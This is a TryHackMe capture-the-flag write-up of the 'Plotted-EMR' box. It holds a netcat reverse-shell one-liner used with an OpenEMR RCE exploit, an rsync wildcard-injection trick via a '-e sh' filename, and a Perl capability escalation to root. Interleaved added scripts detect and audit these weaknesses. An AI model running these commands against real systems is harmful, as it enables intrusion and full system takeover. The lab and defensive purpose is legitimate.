Plotted-EMR – Walkthrough En | TryHackMe – Write-up

Everything here is plotted!

Plotted-EMR is a hard box from TryHackMe. The initial foothold is very good: you have to think and put the pieces together! After that, it's classic privesc.



Command:

nmap -sV -sC -T5


Nmap shows us 5 open ports. Each of them needs to be enumerated. We'll start with the FTP service.

FTP enumeration

Access to the FTP service is done with the anonymous account.

You have to look carefully (note the `.-` entry), then finally download the file you_are_determined.txt with the command:

mget you_are_determined.txt

Reading the file you_are_determined.txt:

cat you_are_determined.txt

We get a clue: there is a service that works with the account admin. It remains to find out which one.

MariaDB / MySQL enumeration

Nmap already gave us the version. We will try to connect to the service with the admin account.

Command:

mysql -u admin -h -P 5900

Access is possible without a password. On the other hand, there is nothing interesting inside the databases.

Web enumeration.

Port 80

dirsearch -u -x 403



We land on a page with what appears to be a base64-encoded string.


The same thing in its directory.


Both elements are just rabbit holes:

dGhpcyBtaWdodCBiZSBhIHVzZXJuYW1l === this might be a username

aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ== === https://www.youtube.com/watch?v=dQw4w9WgXcQ


Port 8890

Command:

dirsearch -u :8890 -x 403

We get several interesting directories.



We land on a login page


Vulnerability on Plotted-EMR

A Google search shows that these versions are vulnerable, but the exploit requires authentication. We must therefore find a way to log in to the interface.

First, we will enumerate the website again, this time only under /portal.

Command:

dirsearch -u :8890/portal -x 403

There is a setup.php page which apparently allows us to set up a new site. After some Google research, it turns out there is also another page, admin.php, which gives us further information.

Creation of a new site

This is not a very simple feat to set up. You have to think about and remember the access you found before. It took me a long time to understand…

You have to give the site a name and continue.


Choose: Have setup create the database


And finally we arrive at the configuration page of the new site.

Information to change:


Server Host:

Server Port: 5900

Login Name: newuser

Password: whatever you want

Name for Root Account: admin (this is the account with which we connected to the SQL database)


Initial User: newsadmin

Initial User Password: whatever you want


Be careful: after clicking on continue, it can take up to 1 minute to get to the next step.
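From the defender's side, the whole site-creation trick depends on the installer (/portal/setup.php) and the multi-site admin page (/portal/admin.php) still being reachable on a live instance. The following script is an added example, not part of the original write-up or of OpenEMR: it flags requests to those two pages in a combined-format web access log so the activity can be alerted on. The log lines are constructed samples (the client addresses, timestamps and the site name `newsite` are made up); the default Apache log path in the usage comment is an assumption.

```sh
#!/bin/sh
# Added example, not from the original write-up: flag requests to the
# OpenEMR installer (/portal/setup.php) and multi-site admin page
# (/portal/admin.php) in a combined-format access log. On an installed
# instance these pages should be removed or blocked, so any 200 on them
# is worth an alert. The log lines below are constructed samples.

SAMPLE_LOG='10.0.0.5 - - [10/Mar/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2022:10:01:09 +0000] "GET /portal/setup.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2022:10:02:31 +0000] "POST /portal/setup.php?site=newsite HTTP/1.1" 200 3011 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2022:10:03:00 +0000] "GET /portal/admin.php HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2022:10:04:00 +0000] "GET /portal/interface/login/login.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"'

# Reads access-log lines on stdin and prints "client method path status"
# for each hit on the installer or admin page. Field positions follow the
# combined log format: $1 client, $6 "method, $7 path, $9 status.
flag_setup_requests() {
    awk '$7 ~ /^\/portal\/(setup|admin)\.php/ {
             method = $6; sub(/^"/, "", method)
             print $1, method, $7, $9
         }'
}

# Count only successful hits; after go-live the expected number is zero.
count_successful_setup_hits() {
    flag_setup_requests | awk '$4 == "200"' | wc -l | tr -d ' '
}

# Usage on a real host (assumed default Apache log path):
#   flag_setup_requests < /var/log/apache2/access.log
printf '%s\n' "$SAMPLE_LOG" | flag_setup_requests
```

Run against the sample it prints the three installer/admin hits; the POST to setup.php with a `site=` parameter is the one that corresponds to a new site being created. The permanent fix is to delete or deny access to setup.php once installation is finished, which is also what OpenEMR's own post-install guidance asks for.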


Access to the new site

Initial foothold

Now that we have credentials to log in to the OpenEMR application, it is possible to use the available exploits that give RCE.

Exploit to use:

Line 66 of the exploit needs to be changed: put the name of the new site there.


Command to launch the exploit:

python2.7 -u admin -p password -c 'rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 1234 > f'


Local enumeration - cron task - privilege escalation 1

Linpeas shows us a scheduled task that runs every minute.

There is a wildcard in the command line, which can be used to elevate privileges: the script backs up everything (*) in the config folder with rsync, so we create a file in this folder whose name forces rsync to execute the command we insert.

Command:

cd /var/www/html/portal/config

echo "cp /bin/bash /home/plot_admin/shell; chmod +s /home/plot_admin/shell" >

touch -- "-e sh"

Once the scheduled task has been executed, you must go to the /home/plot_admin folder and execute the new bash.

Command:

./shell -p
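The root cause here is the unquoted `*` in the cron job's rsync command: the shell expands it to bare file names, and a name that starts with `-` is parsed by rsync as an option. The script below is an added example, not from the original write-up: it lists option-looking names in a directory (what an administrator should audit) and shows, side by side, the argv the shell produces for `*` and for the hardened form `./*`, where every entry is a path and can no longer be read as an option. The directory it uses is a constructed temporary stand-in for /var/www/html/portal/config.

```sh
#!/bin/sh
# Added example, not from the original write-up: audit a directory that a
# cron job hands to rsync through an unquoted '*', and compare the argv the
# shell produces for '*' and for './*'. The temporary directory and its file
# names are constructed for the demo; the real one on the box is
# /var/www/html/portal/config.

# Print every entry in DIR whose name starts with '-'. With an unquoted '*'
# each such name reaches rsync as an option (rsync reads "-e sh" as its
# --rsh option) instead of as a file.
find_option_like_names() {
    for f in "$1"/-*; do
        [ -e "$f" ] || continue      # no match: the pattern itself is left
        printf '%s\n' "${f##*/}"
    done
}

# argv produced by the unsafe and the hardened glob, one entry per line.
expand_unsafe() { ( cd "$1" && printf '%s\n' * ); }    # "-e sh" arrives bare
expand_safe()   { ( cd "$1" && printf '%s\n' ./* ); }  # "./-e sh" is a path

demo() {
    d=$(mktemp -d)                   # constructed stand-in for the config dir
    : > "$d/zzz.conf"
    : > "$d/-e sh"
    echo "option-like names:";  find_option_like_names "$d"
    echo "argv with  *  :";    expand_unsafe "$d"
    echo "argv with ./* :";    expand_safe "$d"
    rm -rf "$d"
}
demo
```

The same `./*` rule applies to any cron job that globs into a directory writable by a less privileged user (tar, chown and rsync are the classic cases); running the audit function from a daily job, or simply refusing to back up a directory that contains such names, catches the planted file before the next minute's run.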


Privilege escalation - capabilities

Linpeas had already shown it: Perl has capabilities. The GTFOBins website explains how to use them to elevate privileges to root.

Command:

getcap -r / 2>/dev/null

Original command from GTFOBins:

./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

Modified command:

/usr/bin/perl -e 'chmod 7777, "/bin/bash"'

/bin/bash -p
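The `getcap -r /` listing above is exactly what a hardening review should run, but on a real host it is long and mostly harmless entries such as cap_net_raw on ping. The script below is an added example, not from the original write-up or from GTFOBins: it filters getcap output down to binaries holding capabilities that amount to root for whoever can run them (cap_setuid on an interpreter being the case on this box). The sample getcap lines are constructed; the list of risky capabilities is my own choice and can be extended.

```sh
#!/bin/sh
# Added example, not from the original write-up: triage `getcap -r /` output
# and list binaries holding capabilities that are equivalent to root in the
# hands of an unprivileged user. The sample lines are constructed; on a real
# host run:  getcap -r / 2>/dev/null | flag_risky_caps

# Capabilities that let a process change identity, ignore file permissions,
# load kernel code or reach into other processes. Extend to taste.
RISKY_CAPS='cap_setuid|cap_setgid|cap_dac_override|cap_dac_read_search|cap_fowner|cap_chown|cap_sys_admin|cap_sys_ptrace|cap_sys_module'

SAMPLE_GETCAP='/usr/bin/ping cap_net_raw=ep
/usr/bin/perl cap_setuid=ep
/usr/bin/python3.8 = cap_net_bind_service,cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep'

# Accepts both getcap output styles ("path cap=ep" and "path = cap+ep") and
# prints "path<TAB>capabilities" for each risky entry.
flag_risky_caps() {
    awk -v re="(^|,)($RISKY_CAPS)" '
        {
            path = $1
            caps = $NF                      # capability set is the last field
            sub(/[=+][a-z]*$/, "", caps)    # drop the flags: cap_setuid=ep -> cap_setuid
            if (caps ~ re) print path "\t" caps
        }'
}

printf '%s\n' "$SAMPLE_GETCAP" | flag_risky_caps
```

Anything this prints for an interpreter or a general-purpose tool should be removed with `setcap -r <path>`, and the only acceptable remaining entries are the narrow network ones on purpose-built binaries. A file capability set, unlike a setuid bit, does not show up in `ls -l`, which is why this listing belongs in the regular audit rather than being left to the next Linpeas run.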



That’s all folks

Thank you for taking the trouble to come to the site to read this write-up.

I hope you enjoyed it and that it taught you something new.

Feel free to leave a comment or share this article.